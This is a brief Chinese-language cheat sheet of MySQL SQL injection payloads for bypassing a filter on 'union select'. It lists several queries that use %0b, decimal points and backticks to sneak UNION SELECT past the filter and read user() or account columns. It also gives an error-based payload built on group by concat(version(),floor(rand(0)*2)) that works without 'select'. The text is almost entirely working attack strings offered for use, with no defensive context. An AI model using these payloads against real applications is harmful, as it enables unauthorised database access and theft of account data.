\bunion select\b的过滤绕过(mysql数据库)
select 1 from user where islock= -1.%0bunion select user()
select 1 from user where islock=1+100.union select user()
select 1 from user where islock=1 and 1=1.union select user()
select 2 from user where islock=1 union select.``.account from user
不用select ,但是只能局限于本表和知道字段名称
select * from user where islock=0 and mid(account,1,1)!='c' xor 1 group by concat(version(),floor(rand(0)*2)) having min(0)